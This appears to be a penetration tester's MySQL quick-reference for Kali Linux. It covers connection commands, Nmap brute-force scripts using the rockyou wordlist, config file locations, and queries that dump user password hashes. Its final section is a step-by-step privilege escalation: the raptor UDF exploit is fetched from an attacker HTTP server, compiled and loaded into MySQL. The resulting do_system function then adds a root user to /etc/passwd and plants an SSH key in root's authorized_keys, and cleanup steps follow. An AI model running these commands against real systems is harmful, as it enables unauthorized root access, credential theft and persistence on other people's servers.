MySQL database quick reference.
MariaDB is a fork of MySQL and uses similar syntax.
Start MySQL service on Kali
sudo service mysql startStop MySQL service on Kali
sudo service mysql stopConnection
On Kali
sudo mysqlLocally
mysql -u <username> -p <database>mysql -u<username> -p<password> -e 'show databases;'Remote server
mysql -u <username> -p -h $IPmysql -u <username> -p -h $IP --port=1234Nmap scripts
ls -la /usr/share/nmap/scripts/mysql*nmap -p 3306 --script=mysql* $IPWL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WLExamples
Configurations / Parameters
Variables (configurations?)
Use \G to display vertically (more easily readable).
show variables\G;Configurations / Parameters
C:\Windows\my.ini
C:\Windows\my.cnf
C:\my.ini
C:\my.cnf
C:\xampp\mysql\my.ini
C:\xampp\mysql\my.cnf
C:\xampp\mysql\bin\my.ini
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option
# Configuration file:
my.cnf
# Start MySQL
mysql.server start
# Stop MySQL
mysql.server stop
# Execute OS commands from within MySQL client
\! ls -l
\! nano
\! bash
# Comments
SELECT 1+1; # This comment continues to the end of line
SELECT 1+1; -- This comment continues to the end of line
SELECT 1 /* in-line or multiple line comment */ + 1;
# String identifier
` or '
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';
# List all databases
show databases;
# List all tables
use dbname;
show tables;
#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
SELECT id,name,email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n'
select 1 from information_schema.tables limit 1 into outfile '/tmp/test.txt';select distinct table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = 'schema found in previous query';
select column_name from information_schema.columns where table_name='table found in previous query';Users and passwords
Query depends on version…
select user, authentication_string from mysql.user;select user, password from mysql.user;Privilege Escalation
Raptor
https://www.exploit-db.com/exploits/1518
Requires gcc on target, unless target is Debian (in this case compile on Kali).
searchsploit -m linux/local/1518.c
### REMOVE LINES AT THE END OF EXPLOIT
python3 -m http.server 80wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lcChange path to create raptor_udf2.so according to “select @@plugin_dir”
mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');Via /etc/passwd
select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');ssh myprecious@x.x.x.x
[PreciouS]Via authorized_keys
Can generate a key in the user home on the victim also, this works.
# Generate a public/private key pair
ssh-keygen -t rsa
[leave all default parameters]
chmod 400 id_rsaselect do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');ssh -i id_rsa root@x.x.x.xCleanup tasks
mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quitfind / -name raptor_udf2.sorm /<path to file>/raptor_udf2.so